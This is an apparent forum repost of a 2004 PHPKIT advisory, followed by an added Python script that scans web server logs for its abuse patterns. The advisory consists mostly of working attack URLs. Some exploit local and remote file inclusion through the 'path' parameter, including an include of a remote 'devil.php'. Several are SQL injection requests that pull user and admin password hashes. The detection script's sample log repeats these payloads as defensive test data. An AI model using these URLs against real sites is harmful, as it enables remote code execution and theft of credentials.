qcred11
Jun 5 2004, 06:51 PM
| QUOTE |
Program: PHPKIT-Homepage-Software
Risk: Extremely High
Exploit: Yes
Homepage: http://www.phpkit.de/
Description: A remote attacker can execute arbitrary PHP code, perform SQL injection, and determine the installation path.
Local PHP include: http://hanter/include.php?path=/home/devil.php
Include in system administration: http://hanter/admin/admin.php?path=http://host/devil.php
Installation path: http://hanter/include.php?path=update_1602.php
SQL injection + retrieving MD5 password hashes (users and admins):
http://hanter/include.php?path=comment/com...null,user_email, user_name,null,null,null,null,user_pw,null,null,null+FROM+phpkit_user+WHERE+user _id='1
http://hanter/include.php?path=login/membe...,null,null,null, null,user_pw,null,null,user_name,null,null,null,null,null,null,null,null,null,nu ll, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+ FROM +phpkit_user+WHERE+user_name+LIKE+'%
http://hanter/include.php?path=comment/com...,null,null,null, user_name,null,user_pw,null+FROM+phpkit_user+WHERE+user_id='1 +
http://hanter/include.php?path=login/useri...id='sql-inj
http://hanter/include.php?path=content/ove...er='sql-inj
http://hanter/include.php?path=forum/showc...id='sql-inj
http://hanter/include.php?path=login/imcen...id='sql-inj
http://hanter/include.php?newposttime='...=forum/main.php
http://hanter/include.php?path=forum/showt...d=3'sql-inj
http://hanter/include.php?path=login/maile...d=1'sql-inj
http://hanter/include.php?path=content/dow...=14'sql-inj
Credits: Hanter {hanter-xxx-net@mail.ru}
|
Link is unavailable
Sent by mailing list
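For anyone running PHPKIT who wants to check their web server logs for the three abuse patterns the advisory describes (an absolute local path, a remote URL, or an SQL payload handed to the `path` parameter of include.php / admin.php), here is an added detection example. It is not part of the advisory or of PHPKIT; the log lines, client addresses and timestamps are constructed, and the script names and parameter come from the advisory's URLs.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the advisory); the first
# request is a normal PHPKIT module load, the other three mirror the local
# include, remote include and SQL-injection patterns described in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2004:18:51:02 +0200] "GET /include.php?path=forum/main.php HTTP/1.1" 200 5120
10.0.0.9 - - [05/Jun/2004:18:52:10 +0200] "GET /include.php?path=/home/devil.php HTTP/1.1" 200 88
10.0.0.9 - - [05/Jun/2004:18:52:41 +0200] "GET /admin/admin.php?path=http://host/devil.php HTTP/1.1" 200 88
10.0.0.9 - - [05/Jun/2004:18:53:07 +0200] "GET /include.php?path=login/member.php?user_name='+UNION+SELECT+null,user_pw+FROM+phpkit_user+WHERE+user_name+LIKE+'%25 HTTP/1.1" 200 9100
"""

# Common Log Format: client, ident, user, [timestamp], "request line", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# A quote or a bare SQL keyword has no place in a module path such as forum/main.php.
SQLI_RE = re.compile(r"'|\b(union|select|from|where)\b", re.IGNORECASE)


def classify_path_value(value):
    """Label one decoded ?path= value; None means it looks like a normal module path."""
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):
        return "remote-file-inclusion"      # URL handed to include()
    if value.startswith(("/", "\\")) or ".." in value:
        return "local-file-inclusion"       # absolute path or directory traversal
    if SQLI_RE.search(value):
        return "sql-injection"              # payload smuggled via the module's own query string
    return None


def scan_log(text):
    """Return one finding per request whose ?path= parameter matches an abuse pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # unparseable line: skip rather than guess
        url = urlsplit(m.group("target"))
        for value in parse_qs(url.query, keep_blank_values=True).get("path", []):
            kind = classify_path_value(value)
            if kind:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "script": url.path, "kind": kind, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['script']} {f['kind']}: {f['value']}")
```

Path disclosure via a non-module file (the update_1602.php request in the advisory) cannot be told apart from legitimate use by pattern alone; an allowlist of the installation's real module paths is needed for that case.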